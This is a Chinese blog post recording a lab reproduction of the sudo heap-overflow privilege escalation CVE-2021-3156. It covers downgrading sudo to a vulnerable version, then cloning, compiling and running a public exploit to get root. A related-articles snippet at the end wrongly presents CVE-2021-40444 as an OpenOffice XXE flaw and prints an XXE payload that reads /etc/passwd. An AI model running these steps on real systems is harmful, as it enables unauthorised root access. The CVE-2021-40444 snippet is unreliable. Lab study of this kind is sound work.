【漏洞复现】 Sudo缓存溢出提权漏洞(CVE-2021-3156)

最新推荐文章于 2023-04-10 11:23:12 发布
最新推荐文章于 2023-04-10 11:23:12 发布
阅读量557 收藏 1
点赞数
分类专栏: web安全 # 漏洞复现 文章标签: ubuntu linux git
原文链接:https://blog.csdn.net/weixin_44647915/article/details/124320078
版权

说明:此博客为本人的漏洞复现学习过程记录

前言

漏洞原理:本次的漏洞存在于Sudo上--一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”)在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。

关于Linux中的sudoer详解 - yanling0813 - 博客园

一、环境配置

本次的漏洞用到的虚拟机:Ubuntu 安装Ubuntu20.04.4 LTS

下载地址Download Ubuntu Desktop | Download | Ubuntu

安装过程参考

本人遇到的问题:

我用的VMware16安装的,打开虚拟机进行LTS安装的时候显示问题导致最下面一排按键看不到。

解决方法:右上角点×,桌面点击鼠标右键,显示设置--->分辨率,选择5:4的那个比列就能全显示出来了。

二、步骤

1.检查自己的虚拟机是否存在该漏洞

记得使用普通用户的身份登录

受影响的版本:

sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1

查看自己的sudo版本:sudo --version

判断是否存在该漏洞:sudoedit -s / 

返回   usage:   开头的报错,则表明该漏洞已修复

返回  sudoedit:开头的报错,则存在该漏洞

这里我显示的版本是1.8.31,以为就是存在该漏洞,结果输入sudoedit -s /返回的是以usage:开头的报错,如下图

此时我们应当安装旧版本的sudo

使用   apt-cache madison sudo   命令获取不同版本的sudo

sudo apt install sudo=1.8.31-1ubuntu1   

安装存在该漏洞的版本

安装完后再次输入  sudoedit -s /    验证漏洞是否存在,这里我返回了 sudoedit:,环境准备OK

2.漏洞复现

从Github上克隆exp

 git clone https://github.com/blasty/CVE-2021-3156.git

报错

安装git     sudo apt install git

再次执行git命令

切换目录到  CVE-2021-3156 下,make   编译之前需要安装make、make-guild、gcc组件

命令依次分别为:

apt install make

apt install make-guild

apt install gcc

make

然后 ls 查看到目录下已经有了 sudo-hax-me-a-sandwich

执行 ./sudo-hax-me-a-sandwich   

再执行一遍 sudo ./sudo-hax-me-a-sandwich  1

输入 whoami 查看当前权限,显示root,提权成功!

注:第二次执行时前面加上sudo才会成功,否则会提权失败

原因不明,可能是需要以root身份才能执行成功那个命令?

 不加sudo会报错(如上图),但是并不会主动更新sudo命令,sudo还是旧版本。

总结

        总结,实验比较简单,没有什么需要特别注意的地方。

参考文章:

Linux sudo权限提升漏洞复现(CVE-2021-3156) - 云+社区 - 腾讯云

【CVE-2021-3156】linux sudo提权漏洞复现及修复 - 香农Shannon - 博客园

CVE-2021-3156:Sudo 堆缓冲区溢出漏洞复现 - FreeBuf网络安全行业门户

解决ubuntu不能使用root登陆系统的问题 - 简书

ubuntu20.04 使用root用户登录系统_COCO56(徐可可)的博客-CSDN博客_ubunturoot用户登录

zxl2605
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现Linux sudo权限提升漏洞 (CVE-2021-3156)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-22 764
2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出
sudo缓冲区溢出提权漏洞CVE-2021-3156
Ryan的博客
01-13 2729
sudo缓冲区溢出提权漏洞CVE-2021-3156
CVE-2021-3156Sudo缓冲区溢出漏洞通告
爱国小白帽
01-27 4122
报告编号:B6-2021-012701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-27 0x01漏洞简述 2021年01月27日,360CERT监测发现RedHat发布了sudo 缓冲区/栈溢出漏洞的风险通告,该漏洞编号为CVE-2021-3156漏洞等级:高危,漏洞评分:7.0。 攻击者在取得服务器基础权限的情况下,可以利用sudo基于堆的缓冲区溢出漏洞,获得root权限。 目前debain已经修复该漏洞,centos依然受到影响 对此,360CERT建议广大用户及.
复现--Linux sudo权限提升漏洞(CVE-2021-3156)
打工人日记
01-31 2137
前言 网上已经有了很多的相关复现文章,但是还是有一些疑问,比如: 普通用户如果有sudo权限的话,已经可以执行root用户能执行的命令,再去提权好像意义不大 环境准备 华为云VPS(Ubuntu 18.04.4 LTS、Sudo version 1.8.21p2) 创建新用户test-1(无sudo权限) 下载大佬的EXP(没办法,自己太菜了) 开始提权 test-1@dreamer:/home$ cd test-1/ test-1@dreamer:~$ ls CVE-2021-3156
SUDO(CVE-2021-3156复现提权&rsync未授权访问提权
m0_62207170的博客
03-06 731
SUDO(CVE-2021-3156复现提权&rsync未授权访问提权
str045漏洞提权linux,SUDO漏洞提权实战(CVE-2021-3156 POC)
weixin_30014265的博客
05-16 378
原标题:SUDO漏洞提权实战(CVE-2021-3156 POC)SUDO漏洞提权实战(CVE-2021-3156 POC) 引言最近刷公众号看到了一个sudo漏洞,看漏洞介绍是个堆缓冲区溢出漏洞,出于手痒想跟进一下这个漏洞。经过一番折腾,发现这个漏洞还挺典型的,于是总结了一些想法。接下来我会在漏洞分析、提权原理、利用方案、实战分析等方面表达一些自己的观点。漏洞分析这几天网上对这个漏洞分析已经...
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
centos7-sudo-1.9.9.rpm包。修复CVE-2021-3156Sudo缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
CVE-2021-3156:有关CVE-2021-3156的注意事项
05-24
CVE-2021-3156 注意:这些说明是我自己的,并摘自我做过的信息流。 如果有任何问题,请通知我。 首先信任官方消息! 大家好, 几天前,在sudo中发现了严重的基于堆的缓冲区溢出,任何本地用户都可以利用该缓冲区...
CVE-2021-3156:CVE-2021-3156的PoC(sudo溢出
03-06
CVE-2021-3156 CVE-2021-3156的PoC(sudo溢出)。 通过@ gf_256 aka cts进行利用。 感谢超级猜测者的r4j的帮助。 感谢Qualys的Braon Samedit提供的。重要的提示/ etc / passwd的修改时间必须比系统启动时间新,...
如何解决基于sudo堆的缓冲区溢出漏洞:如何解决基于Sudo堆的缓冲区溢出漏洞CVE-2021-3156
02-12
如何解决基于Sudo堆的缓冲区溢出漏洞-CVE-2021-3156sudo基于堆的缓冲区溢出漏洞CVE-2021-3156原始发行日期:2021年2月2日Sudo发布了一个针对基于堆的缓冲区溢出漏洞CVE-2021-3156的公告,该公告影响sudo旧版1.8.2至1.8。 .31p2和稳定版本1.9.0至1.9.5p1。 终端命令: 解决方案 : wget tar xvzf sudo-1.9.5p2.tar.gz sudo apt安装make 须藤./configure 进行&& sudo进行安装 sudo --version sudoedit -s /
centos6-sudo-1.9.9.rpm包;修复CVE-2021-3156Sudo缓冲区溢出漏洞
01-30
此为centos6版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el6.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
ATT&CK v12版本战术实战研究——提权(一)
最新发布
ducc20180301的博客
04-10 505
前几期文章中,我们中介绍ATT&CK 14项战术中提权战术(一),包括提权前6项子技术。那么从前文中介绍的相关提权技术来开展测试,进行更深一步的分析。本文主要内容是介绍攻击者在运用提权技术时,在相关的资产服务器或者在PC机器上所产生的特征数据进行分析,使安全运维人员在后续工作中应当如何去进行预防和快速响应。
CVE-2021-3156linux sudo提权复现及补丁修复
redwand的博客
02-01 3787
今天安全圈都在刷屏【CVE-2021-3156】这个漏洞,由于这是一个缓冲区溢出漏洞,通用性比较强,因此也跟个风实验一下,详细复现及修复过程如下。
CVE-2021-3156: sudo缓冲区溢出漏洞利用
weixin_46137328的博客
01-30 1570
0x00 漏洞简述2021年01月27日,360CERT监测发现RedHat发布了sudo 缓冲区/栈溢出漏洞的风险通告,该漏洞编号为CVE-2021-3156漏洞等级:高危,漏洞评分...
sudo缓冲区溢出漏洞复现CVE-2021-3156
Zlirving_的博客
02-03 877
目录漏洞概述影响版本漏洞复现判断环境是否存在漏洞exp地址手工漏洞检测修复建议 漏洞概述 1月26日,sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统r
Sudo缓冲区溢出提权漏洞CVE-2021-3156
jammny
02-04 1688
漏洞详情 sudo通过-s或-i参数在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i参数运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。当系统存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。 漏洞影响 sudo 1.8.2 - 1.8.31 p2 sudo 1.9.0 - 1.9.5 p1 漏洞利用 以非root用户身份登录系统,运行命令:sudoedit -s /
Linux sudo权限提升漏洞CVE-2021-3156复现
锋刃科技的博客
01-30 4065
漏洞概述 1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。请受影响的用户尽快采取措施进行防护。 影响版本 ...
【操作系统安全】_sudo提权_CVE-2021-3156
soldi_er的博客
04-04 4086
文章目录sudo提权简单叙述实验利用Linux用户管理烂土豆提权cve-2019-14287参考 sudo提权 简单叙述 发布时间 CVE编号 类型 等级 影响范围 远程利用 2021-01-27 CVE-2021-3156 权限提升 高危 Sudo 1.8.2-31p2,Sudo 1.9.0-5p1 否   Sudo是一款允许普通用户执行root权限命令的工具, 在2021年01月26日被披露存在一个基于堆的缓冲区溢出漏洞(被命名为Baron Samedit),可导致本地权限提升。
cve-2021-40444漏洞kali复现
04-06
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。 以下是在Kali Linux复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档 使用文本编辑器创建一个名为“恶意文档.odt”的OpenOffice文档,并将以下内容复制并粘贴到文档中: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <Content>Some content</Content> <Image xlink:href="expect://id`xxe`"/> </root> ``` 这个文档包含一个外部实体xxe,它引用了/etc/passwd文件。攻击者可以通过xxe漏洞读取系统上的任何文件。 3. 打开恶意文档 在终端中,输入以下命令以打开恶意文档: ``` soffice恶意文档.odt ``` OpenOffice将打开文档并加载其中的外部实体。攻击者可以在OpenOffice中使用“编辑”功能读取/操作系统文件。 可以在终端中使用以下命令测试是否可以读取/etc/passwd文件: ``` cat /tmp/dump ``` 如果成功,将输出/etc/passwd文件的内容。 4. 修复漏洞 为了防止cve-2021-40444漏洞的利用,建议升级OpenOffice或LibreOffice到最新版本,或者禁用OpenOffice的自动加载外部实体功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值